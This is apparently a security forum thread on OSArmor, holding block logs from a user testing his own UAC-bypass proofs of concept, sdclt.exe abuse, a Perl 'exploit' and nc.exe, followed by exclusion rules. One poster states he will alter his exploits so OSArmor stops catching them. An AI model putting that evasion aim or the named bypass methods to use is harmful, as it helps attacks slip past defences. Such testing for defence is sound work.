Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:19
Process: [1492]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:20
Process: [1116]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:21
Process: [608]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:22
Process: [3084]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:23
Process: [2880]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:24
Process: [1548]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:25
Process: [1624]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:25
Process: [3488]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:26
Process: [3872]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:27
Process: [2460]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:27
Process: [1172]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:28
Process: [3292]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:29
Process: [3416]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:29
Process: [3540]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:31
Process: [1452]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:32
Process: [624]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:33
Process: [3260]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:34
Process: [2292]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:34
Process: [1976]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:34
Process: [2252]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:35
Process: [3936]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:35
Process: [3308]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:35
Process: [3940]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:35
Process: [3000]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:36
Process: [3372]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:36
Process: [3696]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:36
Process: [3660]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:37
Process: [3656]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:37
Process: [3008]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:37
Process: [3176]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:38
Process: [1604]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:38
Process: [2232]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:39
Process: [1548]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:39
Process: [2460]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:39
Process: [1172]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:39
Process: [3284]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:40
Process: [2084]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:40
Process: [1032]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:40
Process: [296]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:41
Process: [2528]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:41
Process: [2488]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:41
Process: [2640]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:42
Process: [3756]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:42
Process: [2288]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:42
Process: [3536]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:43
Process: [3472]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:43
Process: [2852]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:43
Process: [3428]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:44
Process: [1548]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:44
Process: [2084]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:44
Process: [3540]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:45
Process: [3180]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 02:00:01
Process: [2520]C:\Windows\System32\UserAccountControlSettings.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: "C:\Windows\system32\UserAccountControlSettings.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:00:05
Process: [3756]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1112 00517C40
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 02:00:09
Process: [800]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 386 0165B538
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 02:00:10
Process: [1432]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 386 0165B538
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 02:13:20
Process: [3828]C:\Users\BlackBox\Desktop\package.exe
Parent: [1752]C:\Windows\System32\cmd.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: package  Matrix
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:13:46
Process: [2820]C:\Users\BlackBox\Desktop\package.exe
Parent: [1752]C:\Windows\System32\cmd.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: package  Matrix
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:18:03
Process: [1900]C:\Users\BlackBox\Desktop\package.exe
Parent: [1752]C:\Windows\System32\cmd.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: package  installer.exe
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:18:15
Process: [4036]C:\Users\BlackBox\Desktop\package.exe
Parent: [1752]C:\Windows\System32\cmd.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: package  installer.exe
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:18:29
Process: [3872]C:\Users\BlackBox\Desktop\package.exe
Parent: [1752]C:\Windows\System32\cmd.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: package  installer.exe
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:19:11
Process: [3936]C:\Users\BlackBox\Desktop\package.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\BlackBox\Desktop\package.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:20:04
Process: [1172]C:\Windows\System32\sdclt.exe
Parent: [3424]C:\Users\BlackBox\Desktop\package.exe
Rule: BlockSdcltExecution
Rule Name: Block execution of sdclt.exe (Windows Backups)
Command Line: "C:\Windows\System32\sdclt.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:23:05
Process: [3372]C:\Windows\System32\sdclt.exe
Parent: [324]C:\Users\BlackBox\Desktop\package.exe
Rule: BlockSdcltExecution
Rule Name: Block execution of sdclt.exe (Windows Backups)
Command Line: "C:\Windows\System32\sdclt.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:24:01
Process: [3280]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
Parent: [3828]C:\Users\BlackBox\Desktop\exploit.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:35:59
Process: [3040]C:\Windows\System32\sdclt.exe
Parent: [3540]C:\Users\BlackBox\Desktop\package.exe
Rule: BlockSdcltExecution
Rule Name: Block execution of sdclt.exe (Windows Backups)
Command Line: "C:\Windows\System32\sdclt.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:36:49
Process: [3004]C:\Windows\System32\wscript.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockVbsScripts
Rule Name: Block execution of .vbs scripts
Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\POC.vbs"
Signer:
Parent Signer:

Date/Time: 18/01/2018 02:37:33
Process: [3284]C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\AdvancedRun.exe
Parent: [3932]C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\POC.exe
Rule: BlockProcessesReatedToNirSofer
Rule Name: Block execution of any process related to NirSoft
Command Line: "C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\AdvancedRun.exe" /run
Signer: Nir Sofer
Parent Signer:

Date/Time: 18/01/2018 02:40:23
Process: [2888]C:\Windows\System32\wscript.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockVbsScripts
Rule Name: Block execution of .vbs scripts
Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\POC.vbs"
Signer:
Parent Signer:

Date/Time: 18/01/2018 03:10:37
Process: [1896]C:\ProgramData\nc.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockProcessesOnSuspiciousFolders
Rule Name: Block processes located in suspicious folders
Command Line: "C:\ProgramData\nc.exe"
Signer:
Parent Signer:

Now to fix my exploits by removing the triggers so that OSArmor will not block them.

bjm_ · Jan 19, 2018

Peter2150 said: ↑

Is recognizing the sandbox on your to do list. Remember you had to do that for ERP
Click to expand...

ERP 3.1 recognizes my Run Sandboxed files w/wo Full Access *\mailslot\NVTInj\*.
OSA before (test25) sometimes recognized my Run Sandboxed files #653.

#664, #445
FWIW ~ YMMV

BlackBox Hacker · Jan 18, 2018

I can't wait for test26 bring it on OSArmor works better that SOB WOW! Security fixes are implemented and I really like most of the security features including blocking desktop unchecked for testing malware!

Security Fixes:
1. New rule like "Block non-system and unsigned processes on Windows folder and System folder".

Can anybody help me with these rules or just wait for the next test, I'm scared of fxcxing up my Computer with these security policies. Most people on Wilders security said it don't block exploits or it's not an Anti-exploit software, but there very wrong it's killing exploits by the processes not via code injection etc. kill the executable file DLL file will fail to load in memory.

Security fix for Windows folder and system32 folder done!

Code:

// Allow all safe Windows executable files
[%PROCESS%: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe] [%PROCESSFILEPATH%: C:\Windows\System32\WindowsPowerShell\v1.0\] [%PROCESSCMDLINE%: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\BlackBox\Desktop\New Projects\UAC_Bypass_Exploit_3\POC.ps1"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\explorer.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\explorer.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\regedit.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\regedit.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\explorer.exe] [%PROCESSFILEPATH%: C:\Windows\] [%PROCESSCMDLINE%: "C:\Windows\explorer.exe"] [%PARENTPROCESS%: C:\Windows\System32\taskmgr.exe] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\oasrnxnk.cmdline"] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe] [%PARENTFILEPATH%: C:\Program Files\Intel\Intel(R) Rapid Storage Technology\] [%PARENTSIGNER%: Intel Corporation]
[%PROCESS%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe] [%PROCESSFILEPATH%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\] [%PROCESSCMDLINE%: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 1688 DefaultKMSPID KillProcessOnPort] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\AutoKMS\AutoKMS.exe] [%PARENTFILEPATH%: C:\Windows\AutoKMS\]
[%PROCESS%: C:\Program Files\Microsoft Office\Office14\BCSSync.exe] [%PROCESSFILEPATH%: C:\Program Files\Microsoft Office\Office14\] [%PROCESSCMDLINE%: "C:\Program Files\Microsoft Office\Office14\BCSSync.exe" /DelayServices] [%FILESIGNER%: Microsoft Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]

// Allow all safe system32 executable files
[%FILESIGNER%: Microsoft Windows] [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
[%FILESIGNER%: Intel Corporation] [%PROCESS%: *.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: *DllHost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: *conhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTFILEPATH%: C:\Windows\System32\]
[%PROCESS%: C:\Windows\System32\wininit.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\wininit.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\notepad.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\notepad.exe" C:\Program Files\NoVirusThanks\OSArmorDevSvc\Exclusions.db] [%PARENTPROCESS%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\OSArmorExcHlp.exe] [%PARENTFILEPATH%: C:\Program Files\NoVirusThanks\OSArmorDevSvc\] [%PARENTSIGNER%: NoVirusThanks Company Srl]
[%PROCESS%: C:\Windows\System32\svchost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\svchost.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\cmd.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\cmd.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\shutdown.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\cmd.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\UserAccountControlSettings.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\system32\UserAccountControlSettings.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\WmiPrvSE.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\winlogon.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\winlogon.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\igfxpers.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\igfxpers.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\taskhost.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\taskhost.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\SearchIndexer.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\SearchIndexer.exe"] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\hkcmd.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\hkcmd.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
[%PROCESS%: C:\Windows\System32\igfxtray.exe] [%PROCESSFILEPATH%: C:\Windows\System32\] [%PROCESSCMDLINE%: "C:\Windows\System32\igfxtray.exe"] [%FILESIGNER%: Intel Corporation] [%PARENTPROCESS%: C:\Windows\explorer.exe] [%PARENTFILEPATH%: C:\Windows\]
